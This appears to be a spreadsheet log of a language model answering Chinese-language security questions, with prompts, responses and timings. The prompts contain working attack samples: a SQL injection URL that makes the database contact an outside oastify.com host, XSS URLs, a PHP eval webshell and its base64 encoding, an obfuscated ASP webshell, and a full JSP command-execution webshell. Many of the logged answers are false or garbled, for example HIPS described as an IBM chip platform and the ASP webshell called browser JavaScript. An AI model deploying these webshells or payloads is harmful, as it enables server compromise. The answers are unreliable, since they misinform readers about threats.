这些命令可能会执行不同的操作，例如提取受害者的个人隐私和敏感数据，或者恶意地带来黑客技术攻击。因此，您应该避免访问这种类型的网站，以避免遭受网络攻击。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D59" t="n">
        <v>13.61357569694519</v>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="1" t="n">
        <v>58</v>
      </c>
      <c r="B60" t="inlineStr">
        <is>
          <t>判断这是否是一个网络攻击
http://www.gov1.com/jszwfw/publicservice/itemlist/showDetail.do?webId=1);declare @q varchar(99);set @q='\\ltity6cdyjvf5d3hs9v1o23lvc18p7jvanyel49t.oasti'+'fy.com\fah'; exec master.dbo.xp_dirtree @q;-- &amp;iddept_ql_inf=11320000696785044Q2322007019000&amp;ql_kind</t>
        </is>
      </c>
      <c r="C60">
        <f>1&amp;ql_dept_id=11320000696785044&amp;sub_id=0&amp;sql_text=SELECT+%28%5B%28SELECT+%28%23department_id+%28%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5C+</f>
        <v/>
      </c>
      <c r="D60" t="n">
        <v>23.67960166931152</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="1" t="n">
        <v>59</v>
      </c>
      <c r="B61" t="inlineStr">
        <is>
          <t>这个url中存在转义的字符，请还原，并判断这是否是一个网络攻击吗？
http://218.94.159.228:8088/pqrm/framework/jsonm.jsp?exp_path=mobile.controlservice&amp;amp;info=serviceName=synInfo2Server&amp;amp;domain=pqrm&amp;amp;loginId=njtest61&amp;amp;uuid=null&amp;amp;actionName=doService&amp;amp;origin=imobile&amp;amp;param=planSubDetailJson={&amp;quot;pro_linkman&amp;quot;:&amp;quot;&amp;#65533;&amp;#756;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;pro_tel&amp;quot;:&amp;quot;0510-68555000&amp;quot;,&amp;quot;eco_outside&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_code&amp;quot;:&amp;quot;20230508205&amp;quot;,&amp;quot;check_type&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;task_source_id&amp;quot;:&amp;quot;A100&amp;quot;,&amp;quot;eco_single&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;state&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;729736&amp;quot;,&amp;quot;pro_cert_code&amp;quot;:&amp;quot;00119Q33182R4M/3200&amp;quot;,&amp;quot;goods_copy_local&amp;quot;:&amp;quot;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#1852;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#1205;&amp;quot;,&amp;quot;pro_quality_pass&amp;quot;:&amp;quot;0&amp;quot;,&amp;quot;pro_present&amp;quot;:&amp;quot;&amp;#65533;&amp;#755;&amp;#65533;&amp;quot;,&amp;quot;goods_copy_num&amp;quot;:&amp;quot;2.5&amp;#445;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;goods_sale_year&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;goods_man_consignment&amp;quot;:&amp;quot;0&amp;quot;,&amp;quot;pro_name&amp;quot;:&amp;quot;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#1590;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#619;&amp;#65533;&amp;#65533;&amp;#1520;&amp;#65533;&amp;#631;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#1977;&amp;#65533;&amp;#766;&amp;quot;,&amp;quot;goods_copy_num_measurement&amp;quot;:&amp;quot;&amp;#445;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;task_source&amp;quot;:&amp;quot;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#673;&amp;#65533;&amp;#1075;&amp;#65533;</t>
        </is>
      </c>
      <c r="C61" t="inlineStr">
        <is>
          <t>&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;plan_code_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_code&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_start_date&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_end_date&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_creator&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_description&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_status&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_approve&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_reject&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_modify&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_delete&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_id&amp;quot;:&amp;quot;729736&amp;quot;,&amp;quot;plan_name_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_code_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_start_date_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_end_date_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_creator_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_description_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_status_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_approve_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_reject_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_modify_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_delete_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_id_zh&amp;quot;:&amp;quot;729736&amp;quot;}
这个url中使用了javascript的encodeURIComponent()方法进行了编码，以便在url中包含特殊字符。
判断这是否是一个网络攻击吗？
based on the provided URL, it appears to be a legitimate URL for a web service that is using encoded special characters to pass parameters in the URL.
There are several encoded special characters in the URL, including:
* `%` (escaped as `%25`)
* `;` (escaped as `%3B`)
* `?` (escaped as `%3F`)
* `amp;` (escaped as `%26`)
* `&lt;/` (escaped as `%3C`)
* `&gt;` (escaped as `%3E`)
These encoded special characters are commonly used in URLs to allow for the inclusion of special characters in the URL without breaking the URL syntax.
Based on the provided URL alone, it does not appear to be a network attack. However, it is important to note that the URL could potentially be used in a network attack if it is used in conjunction with other malicious data or if it is used to access a vulnerable web application.
It is always a good practice to verify the authenticity of URLs and to use secure communication protocols (such as HTTPS) to protect against potential network attacks.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D61" t="n">
        <v>19.8389093875885</v>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="1" t="n">
        <v>60</v>
      </c>
      <c r="B62" t="inlineStr">
        <is>
          <t>这是一个网络攻击吗？
http://www.website.com/encode?type=3&amp;id=1%3Cscript%3Ealert(%22xss%22)%3C/script%3E</t>
        </is>
      </c>
      <c r="C62" t="inlineStr">
        <is>
          <t>This is a URL that contains a suspicious script tag. When the user clicks on the link and visits the website, the script tag will be executed, potentially leading to a cross-site scripting (XSS) attack.
Here are some reasons why this URL is suspicious:
1. Unknown domain: The URL is pointing to a domain that is not known or trusted. This increases the risk of an XSS attack.
2. Script tag: The script tag is not encapsulated in a proper HTML comment, which can make it vulnerable to XSS attacks.
3. Unknown parameter: The URL contains an unknown parameter (id=1), which can be used to inject malicious code.
To protect yourself from XSS attacks, you should avoid clicking on suspicious links or visiting untrusted websites. If you are unsure about the legitimacy of a website, you can check its security certificate or contact the website's administrator to verify its authenticity.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D62" t="n">
        <v>5.01775074005127</v>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="1" t="n">
        <v>61</v>
      </c>
      <c r="B63" t="inlineStr">
        <is>
          <t>这是一个网络攻击吗？
http://www.website.com/encode?type=3&amp;id=1&lt;script&gt;alert("xss")&lt;/script&gt;</t>
        </is>
      </c>
      <c r="C63" t="inlineStr">
        <is>
          <t>Please note that this is just an example and it is not real. Do not attempt to access the URL provided as it may be harmful.
The URL you provided is an example of a cross-site scripting (XSS) attack. It is a type of security vulnerability that allows an attacker to inject malicious scripts into a website, which can be executed by the user's browser. In this case, the script "alert('xss')" is injected into the website, which will be executed when the user views the page. This can lead to unauthorized data theft, user profiling, and other malicious activities.
It is important to protect against XSS attacks by validating user input, sanitizing data, and using Content Security Policy (CSP) to define which scripts are allowed to run on a website. Additionally, using a web application firewall (WAF) and keeping software up to date can also help prevent XSS attacks.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D63" t="n">
        <v>4.861932277679443</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="1" t="n">
        <v>62</v>
      </c>
      <c r="B64" t="inlineStr">
        <is>
          <t>XSS攻击有哪些特征？</t>
        </is>
      </c>
      <c r="C64" t="inlineStr">
        <is>
          <t>XSS攻击可以有以下几个特征：
1. 用户input：XSS攻击通常会使用用户输入，例如表单提交、URL参数、JavaScript脚本等。攻击者可以在用户输入中 inject 恶意代码，以便在用户上发送请求时执行这些代码。
2. 不可靠的信任：XSS攻击可以利用不可靠的信任，例如不可靠的数据来源或不安全的 third-party 服务。攻击者可以利用这些不可靠的信任来在用户上执行攻击。
3. 缓存攻击：XSS攻击可以利用缓存机制，例如缓存数据或缓存Cookies等。攻击者可以利用缓存机制来在用户上执行攻击。
4. 跨域攻击：XSS攻击可以利用跨域请求来执行攻击。这种攻击可以在不同域名下发送请求，例如通过 redirect 到不安全的域名。
5. 端到端攻击：XSS攻击可以利用端到端通信来执行攻击。例如，攻击者可以通过端到端通信来在用户端上执行攻击。
6. 非授权访问：XSS攻击可以利用非授权访问来执行攻击。例如，攻击者可以通过非授权访问来访问用户数据或系统。
7. 数据劫持：XSS攻击可以利用数据劫持来执行攻击。例如，攻击者可以通过数据劫持来获取用户数据或系统数据。
8. 系统滥用：XSS攻击可以利用系统滥用来执行攻击。例如，攻击者可以通过系统滥用来获取系统权限或执行恶意操作。
9. 缓存破坏：XSS攻击可以利用缓存破坏来执行攻击。例如，攻击者可以通过缓存破坏来破坏用户缓存或系统缓存。
10. 跨站攻击：XSS攻击可以利用跨站请求来执行攻击。这种攻击可以在不同域名下发送请求，例如通过 redirect 到不安全的域名。
总之，XSS攻击可以通过多种方式来执行攻击，因此需要严格验证用户输入和数据来防止攻击。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D64" t="n">
        <v>21.04108595848083</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="1" t="n">
        <v>63</v>
      </c>
      <c r="B65" t="inlineStr">
        <is>
          <t>如何判断主机是否被入侵？</t>
        </is>
      </c>
      <c r="C65" t="inlineStr">
        <is>
          <t>判断主机是否被入侵是一个非常重要的任务，以下是一些常用的方法：
1. 监控主机的网络 траffics：使用网络监控工具，可以监控主机的网络 траffics，检查是否有不同于常规的网络活动，例如：检查网络流量的大小、包数量和类型，以及检查网络连接的数量和质量。
2. 监控主机的系统级别：使用系统监控工具，可以监控主机的系统级别，检查是否有新的程序或服务被添加，或者是否有内存或处理器的占用率增加。
3. 检查主机的系统 logs：检查主机的系统 logs，以查看是否有任何不当操作或错误操作。
4. 使用安全软件：使用安全软件，例如安全防范软件、杀毒软件，检查主机的安全状态，检查是否有任何恶意软件或恶意程序。
5. 使用网络检测软件：使用网络检测软件，例如网络检测软件，检查主机的网络连接和安全状态。
6. 使用安全核心：使用安全核心，例如安全核心，检查主机的安全状态，检查是否有任何恶意软件或恶意程序。
7. 使用域名服务器：使用域名服务器，例如域名服务器，检查主机的域名和 DNS 记录，以查看是否有任何不当操作或错误操作。
8. 使用邮件服务器：使用邮件服务器，例如邮件服务器，检查主机的邮件服务器和邮件监控器，以查看是否有任何不当操作或错误操作。
需要注意的是，这些方法不是一定可靠的，因为入侵者可能会隐藏他们的操作，或者使用恶意软件或恶意程序来隐藏他们的操作。因此，应该通过多种方法来监控和判断主机是否被入侵，以确保主机的安全。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D65" t="n">
        <v>18.33541393280029</v>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="1" t="n">
        <v>64</v>
      </c>
      <c r="B66" t="inlineStr">
        <is>
          <t>数据泄露有哪些风险？</t>
        </is>
      </c>
      <c r="C66" t="inlineStr">
        <is>
          <t>数据泄露可能会导致的各种风险包括：
1. 个人隐私泄露：数据泄露可能会导致个人的个人资料、姓名、地址、电话号码等隐私泄露，导致人们面临identity theft、诈骗、敏感資訊泄露等威胁。
2. 经济损失：数据泄露可能会导致经济损失，包括客户信任损失、财富损失、误投资等。
3. 重大灾难：数据泄露可能会导致重大灾难，例如：恶意破坏、恶意识识、恶意攻击等。
4. 法律和行政问题：数据泄露可能会导致法律和行政问题，包括违反私隐保护法、违反数据保护法等。
5. 社会影响：数据泄露可能会导致社会影响，包括社会信任危机、社会不稳定、社会不公正等。
6. 媒体报导：数据泄露可能会导致媒体报导，包括社会名人泄露、著作权侵犯等。
7. 客户敏感資訊泄露：数据泄露可能会导致客户敏感資訊泄露，包括财政資訊、个人資訊、醫療資訊等。
8. 误投资：数据泄露可能会导致误投资，包括投资欺诈、投资损失等。
9. 财务泄露：数据泄露可能会导致财务泄露，包括财务数据泄露、财务误投资等。
10. 技术问题：数据泄露可能会导致技术问题，包括系统崩溃、数据损失、技术支持问题等。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D66" t="n">
        <v>18.89712333679199</v>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="1" t="n">
        <v>65</v>
      </c>
      <c r="B67" t="inlineStr">
        <is>
          <t>有哪些HIPS产品？</t>
        </is>
      </c>
      <c r="C67" t="inlineStr">
        <is>
          <t>HIPS（Heterogeneous Integration Platform Services）是IBM的一个集成平台，用于快速整合多个技术领域的芯片设计。以下是一些HIPS产品的列表：
1. HIPS Flow: 用于简化和快速整合芯片设计的Flow工具，包括HDL模型化、硬件拟合、验证和缓存分析等功能。
2. HIPS Liberator: 用于快速整合芯片设计，包括RF、CMOS、BiCMOS和 Photonic 等多种技术领域的芯片设计。
3. HIPS Explorer: 用于探索和分析芯片设计，包括芯片结构、硬件拟合、验证和缓存分析等功能。
4. HIPS Modeler: 用于模拟和分析芯片设计，包括HDL模型化、硬件拟合和验证等功能。
5. HIPS Emulator: 用于模拟和验证芯片设计，包括芯片模拟、验证和缓存分析等功能。
6. HIPS Optimizer: 用于优化芯片设计，包括硬件拟合、验证和缓存分析等功能。
7. HIPS Analyzer: 用于分析芯片设计，包括硬件拟合、验证和缓存分析等功能。
8. HIPS Debugger: 用于调试芯片设计，包括硬件拟合、验证和缓存分析等功能。
这些产品可以帮助开发者快速整合多个技术领域的芯片设计，提高设计效率和质量。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D67" t="n">
        <v>14.71840834617615</v>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="1" t="n">
        <v>66</v>
      </c>
      <c r="B68" t="inlineStr">
        <is>
          <t>如何划分网络区域才能更安全？</t>
        </is>
      </c>
      <c r="C68" t="inlineStr">
        <is>
          <t>如何划分网络区域才能更安全？
划分网络区域是指将网络分成不同的区域，以便对每个区域进行更加精细的安全控制。这种方法可以帮助网络管理者更好地防范攻击和维护网络的安全。
以下是一些可能有用的划分网络区域的方法：
1. 根据网络资源的分类：将网络分成不同的资源类别，例如客户端、服务器、数据库和网络设备等。对每个资源类别进行安全检查和策略定制。
2. 根据网络服务的分类：将网络分成不同的服务类别，例如web服务、电子邮件服务、协议服务等。对每个服务类别进行安全检查和策略定制。
3. 根据网络用途的分类：将网络分成不同的用途类别，例如企业网络、学习网络、个人网络等。对每个用途类别进行安全检查和策略定制。
4. 根据网络连接的分类：将网络分成不同的连接类别，例如内网连接、外网连接、虚拟专用网络等。对每个连接类别进行安全检查和策略定制。
5. 根据网络设备的分类：将网络设备分成不同的类别，例如路由器、交换机、firewall等。对每个设备类别进行安全检查和策略定制。
6. 根据网络流量的分类：将网络流量分成不同的类别，例如网络应用流量、数据流量、VOIP流量等。对每个流量类别进行安全检查和策略定制。
7. 根据网络攻击的分类：将网络攻击分成不同的类别，例如黑客攻击、恶意软件攻击、网络泄露等。对每个攻击类别进行安全检查和策略定制。
8. 根据网络资源的易访问程度的分类：将网络资源分成不同的易访问程度类别，例如内部资源、外部资源、公共资源等。对每个资源类别进行安全检查和策略定制。
9. 根据网络资源的敏感程度的分类：将网络资源分成不同的敏感程度类别，例如高敏感资源、中敏感资源、低敏感资源等。对每个资源类别进行安全检查和策略定制。
10. 根据网络资源的</t>
        </is>
      </c>
      <c r="D68" t="n">
        <v>24.38762617111206</v>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="1" t="n">
        <v>67</v>
      </c>
      <c r="B69" t="inlineStr">
        <is>
          <t>apt组织通常会采用哪些攻击手段？</t>
        </is>
      </c>
      <c r="C69" t="inlineStr">
        <is>
          <t>Apt是一个指代高级恶意软件（Advanced Persistent Threat）的术语，apt组织通常会采用哪些攻击手段？
Apt组织通常采用以下攻击手段：
1.  socially engineered phishing attacks：钓鱼式攻击，通过电子邮件、 instant messaging 或社交媒体等渠道诱惑用户提供敏感信息，例如帐户名称和密码。
2.  Malware infection：恶意软件感染，通过攻击者在用户计算机上传输的恶意软件，攻击者可以通过访问计算机和网络进行快速扩展和扩张。
3.  Lateral movement：side-channel attacks，通过访问与攻击者关联的计算机或网络，以实现快速扩展和扩张。
4.  Privilege escalation：升级权限，通过利用漏洞或恶意软件来升级用户帐户的权限，以实现访问控制和数据泄露。
5.  Data exfiltration：数据泄露，通过将敏感数据从攻击者的计算机或网络 transferred to a remote location，以实现数据泄露。
6.  Command and control：指令和控制，通过将攻击者的计算机或网络与攻击目标的计算机或网络相连，以实现控制和监控。
7.  Denial of Service：屏蔽服务，通过屏蔽或攻击攻击目标的网络或服务，以阻断或减轻攻击目标的访问和服务。
8.  Web application attacks：攻击Web应用程序，通过攻击Web应用程序的漏洞或欺购Web应用程序的权限，以实现攻击目标。
9.  Cloud attacks：攻击云计算环境，通过利用云计算环境中的漏洞或欺购云计算环境的权限，以实现攻击目标。
10.  Mobile device attacks：攻击移动设备，通过利用移动设备的漏洞或欺购移动设备的权限，以实现攻击目标。
这些攻击手段可能会变化或受到更新，因此需要定期审查和缓存最新的攻击手段。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D69" t="n">
        <v>19.66598010063171</v>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="1" t="n">
        <v>68</v>
      </c>
      <c r="B70" t="inlineStr">
        <is>
          <t>这段内容看上去危险吗？
&lt;?php @eval($_POST['caidao']);?&gt;</t>
        </is>
      </c>
      <c r="C70" t="inlineStr">
        <is>
          <t>This code is dangerous because it allows an attacker to execute any PHP code by sending a specially crafted request to the server. The `@` symbol in the `eval()` function is used to suppress errors, which means that any errors that occur during the evaluation of the code will be silently ignored. This can lead to unexpected behavior, including the execution of malicious code.
In this example, the code `&lt;?php @eval('caidao');?&gt;` is executed without any checks or validation, which means that an attacker could potentially send a request that evaluates to any PHP code, including malicious code. This could allow the attacker to gain control of the server, steal sensitive information, or carry out other malicious actions.
To avoid this type of attack, it is important to properly validate and sanitize any user input before executing it as PHP code. This can be done using a variety of techniques, including input validation, output encoding, and using safe modes.
In general, it is never a good idea to use `eval()` functions in a production environment, as they can introduce significant security risks. If you need to execute dynamic code, there are safer alternatives available, such as using a PHP interpreter or a web application firewall.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D70" t="n">
        <v>6.293869495391846</v>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="1" t="n">
        <v>69</v>
      </c>
      <c r="B71" t="inlineStr">
        <is>
          <t>这段base64编码的内容看上去危险吗？
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=</t>
        </is>
      </c>
      <c r="C71" t="inlineStr">
        <is>
          <t>comment:
这段base64编码的内容看上去危险吗？
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
 它可能是一个恶意的 base64 编码的内容，但是我们无法确定它的具体含义或是否有危险。
base64 编码是一种将 binary 数据转换为字符串的方式，它可以将数据编码为字符串，以便在不同的平台上进行交互。但是，如果你接受了一个不知道的 base64 编码的内容，那么它可能会承担一些风险。
为了防止风险，建议你从可靠的来源接受 base64 编码的内容，并且确保你的系统和软件有正确的安全措施。如果你不知道这段 base64 编码的内容的来源，那么可能最好是不要接受它。
总之，如果你不知道这段 base64 编码的内容的来源，那么它可能是一个危险的内容，建议你避免接受它。如果你知道的话，那么可以尝试解决它。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D71" t="n">
        <v>10.33848667144775</v>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="1" t="n">
        <v>70</v>
      </c>
      <c r="B72" t="inlineStr">
        <is>
          <t>这是一个钓鱼邮件吗？
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;title&gt;文档标题&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
  &lt;h2&gt;
    2021 年"中秋节"假日安排如下：
  &lt;/h2&gt;
  &lt;p&gt;一、放假日期 &lt;br/&gt;
  &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;9 月 19 日至 21 日，共 3 天。&lt;br/&gt;&lt;br/&gt;
  二、XXXXXXx&lt;br/&gt;
  &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br/&gt;&lt;br/&gt;
    三、XXXXXX&lt;br/&gt;
  &lt;br/&gt;&lt;br/&gt;
    四、XXXXX&lt;br/&gt;
    &lt;br/&gt;&lt;br/&gt;
    解压密码: XXXXXXXXX &lt;/p&gt;
    &lt;/p&gt;
  &lt;div&gt;
    &lt;hr align="left" style="margin: 0 0 10px 0; border: 0; border-bottom: 1px solid #e4e5e6; height: 0; line-height: 0; font-size: 0; padding: 20px 0 0 0; width: 50px;" /&gt;
    &lt;div style="font-size: 14px; font-family: Verdana; color: #000"&gt;
      &lt;a
        class="xm_write_card" id="in_alias" style=" white-space: normal; display: inline-block; text-decoration: none !important; font-family: -apple-system, BlinkMacSystemFont, PingFang SC, Microsoft YaHei;"
        target="_blank"
      &gt;
        &lt;table style=" white-space: normal; table-layout: fixed; padding-right: 20px;" contenteditable="false" cellpadding="0" cellspacing="0"&gt;
          &lt;tbody&gt;
            &lt;tr valign="top"&gt;
              &lt;td style="width: 40px; min-width: 40px; padding-top: 10px"&gt;
                &lt;div style=" width: 64px; height: 64px; border: 1px #fff solid; border-radius: 50%; margin: 0; vertical-align: top; box-shadow: 0 0 10px 0 rgba(127, 152, 178, 0.14);"&gt;
              &lt;/td&gt;
              &lt;td style="padding: 10px 0 8px 10px"&gt;
                &lt;div class="businessCard_name" style=" font-size: 14px; color: #33312e; line-height: 20px; padding-bottom: 2px; margin: 0; font-weight: 500;"&gt;
                  xxxxxx
                &lt;/div&gt;
                &lt;div class="businessCard_mail" style=" font-size: 12px; color: #999896; line-height: 18px; margin: 0;"&gt;
                  人事部门
                &lt;/div&gt;
              &lt;/td&gt;
            &lt;/tr&gt;
          &lt;/tbody&gt;
        &lt;/table&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
        </is>
      </c>
      <c r="C72" t="inlineStr">
        <is>
          <t>这是一个钓鱼邮件，它包含一些很有趣的文本和HTML元素，可以用于吸引钓鱼者。这里有一些特点值注意：
1. 邮件标题：这个邮件标题非常简洁，但它的语言非常友好，可以吸引钓鱼者关注。
2. 团队成员：这个邮件包含一些团队成员的信息，可以帮助钓鱼者了解这个团队的背景和人才底resh。
3. 链接：这个邮件包含一个链接，可以帮助钓鱼者了解更多信息。
4. 异常的HTML元素：这个邮件中的HTML元素非常具有创意，包括文本、表格、图片和链接。
5. 邮件结束：这个邮件结束了与钓鱼者的进程，并提供了一些链接，可以帮助钓鱼者了解更多信息。
总的来说，这个钓鱼邮件非常有趣，可以帮助钓鱼者了解更多关于这个团队的信息，并且可以吸引钓鱼者的注意力。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D72" t="n">
        <v>11.01055335998535</v>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="1" t="n">
        <v>71</v>
      </c>
      <c r="B73" t="inlineStr">
        <is>
          <t>这是一个钓鱼邮件吗？
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;body&gt;
    &lt;h1&gt;请注意:&lt;br&gt;
        &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;最近员工反映多次收到钓鱼邮件,为了安全起见,请大家尽快点击下方链接下载钓鱼防护软件
        &lt;a href="https://www.baidu.com/"&gt;192.168.100.100/edr.zip&lt;/a&gt;
    &lt;/h1&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
        </is>
      </c>
      <c r="C73" t="inlineStr">
        <is>
          <t>这是一个钓鱼邮件，由于邮件中提到了钓鱼防护软件，因此被分类为钓鱼邮件。
钓鱼邮件通常包含一些特定的字符串或链接，以便在用户点击链接时诱惑他们提供钓鱼软件。这些链接可能会被植入了钓鱼软件，以便在用户点击后下载和安装软件。
这个邮件中提到的链接为“&lt;a href="https://www.baidu.com/"&gt;192.168.100.100/edr.zip&lt;/a&gt;”，这可能是一个域名或IP地址，但它并不是一个有效的链接。这种域名或IP地址可能是一个恶意的链接，可能会攻击用户的计算机或骗取他们提供钓鱼软件。
因此，当接收到类似的钓鱼邮件时，建议不要点击任何链接，而是直接忽略或 Delete 这个邮件。如果您需要下载钓鱼防护软件，可以寻找来自可靠源的软件，例如来自官方的安全软件网站或来自知名的安全软件公司。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D73" t="n">
        <v>11.64256477355957</v>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="1" t="n">
        <v>72</v>
      </c>
      <c r="B74" t="inlineStr">
        <is>
          <t>这是一个webshell吗？
&lt;%&lt;!--"--&gt;
eXecUTe(fun("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107"))
Function fun(Str):
	Str = Split(Str,"%")
	For x=1 To Ubound(Str)
		fun=fun&amp;Chr(Str(x)-66)
	Next
End Function
%&gt;</t>
        </is>
      </c>
      <c r="C74" t="inlineStr">
        <is>
          <t>This is a web shell, written in JavaScript, which can be embedded in a website to gain unauthorized access to a target system. The script is designed to decode and execute shellcode, which is a piece of machine code that can be used to execute arbitrary system commands.
Here's how the script works:
1. The script begins by declaring a function named `fun` that takes a string argument `Str`.
2. The function decodes the string `Str` using the `Split` function, which splits the string into an array of substrings separated by the delimiter `%`.
3. The function then loops through each substring in the array using a `For` loop, and for each substring, it appends the ASCII code of the character at that position in the substring to the `fun` variable using the `Chr` function.
4. The function then ends with the `End Function` statement.
The reason this script is considered a web shell is that it can be embedded in a website and executed by a visitor's browser, without their knowledge or consent. The script can then use the visitor's machine to gain unauthorized access to a target system, potentially leading to a security breach.
It's important to note that this script is just an example, and it's not intended to be used in any malicious or illegal activity. However, it does demonstrate how a simple web page can be used to gain unauthorized access to a target system, and why web security is so important.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D74" t="n">
        <v>8.160077571868896</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="1" t="n">
        <v>73</v>
      </c>
      <c r="B75" t="inlineStr">
        <is>
          <t>这是一个webshell吗？
&lt;%@ page pageEncoding="utf-8"%&gt;
&lt;%@ page import="java.util.Scanner" %&gt;
&lt;HTML&gt;
&lt;title&gt;Just For Fun&lt;/title&gt;
&lt;BODY&gt;
&lt;H3&gt;Build By LandGrey&lt;/H3&gt;
&lt;FORM METHOD="POST" NAME="form" ACTION="#"&gt;
    &lt;INPUT TYPE="text" NAME="q"&gt;
    &lt;INPUT TYPE="submit" VALUE="Fly"&gt;
&lt;/FORM&gt;
&lt;%
    String op="Got Nothing";
    String query = request.getParameter("q");
    String fileSeparator = String.valueOf(java.io.File.separatorChar);
    Boolean isWin;
    if(fileSeparator.equals("\\")){
        isWin = true;
    }else{
        isWin = false;
    }
    if (query != null) {
        ProcessBuilder pb;
        if(isWin) {
            pb = new ProcessBuilder(new String(new byte[]{99, 109, 100}), new String(new byte[]{47, 67}), query);
        }else{
            pb = new ProcessBuilder(new String(new byte[]{47, 98, 105, 110, 47, 98, 97, 115, 104}), new String(new byte[]{45, 99}), query);
        }
        Process process = pb.start();
        Scanner sc = new Scanner(process.getInputStream()).useDelimiter("\\A");
        op = sc.hasNext() ? sc.next() : op;
        sc.close();
    }
%&gt;
&lt;PRE&gt;
    &lt;%= op %&gt;&gt;
&lt;/PRE&gt;
&lt;/BODY&gt;
&lt;/HTML&gt;</t>
        </is>
      </c>
      <c r="C75" t="inlineStr">
        <is>
          <t>&lt;/%&gt;
```
这是一个简单的WebShell，它使用了`ProcessBuilder`类创建一个进程，并通过读取进程输入流来获取用户输入。在这个例子中，用户可以输入一个命令，并在响应中看到命令执行结果。
在这个例子中，我们使用了一个`ProcessBuilder`对象来创建一个进程，并将用户输入作为命令传递给它。然后，我们使用了一个`Scanner`对象来读取进程输入流，并将结果显示在屏幕上。
这个WebShell可以用于执行一些简单的命令，但它并不安全。在实际使用中，您应该使用更加安全的方式来处理用户输入，例如使用`HttpServletRequest`和`HttpServletResponse`对象来处理Form表单提交，并使用安全的方式来防止XSS攻击。
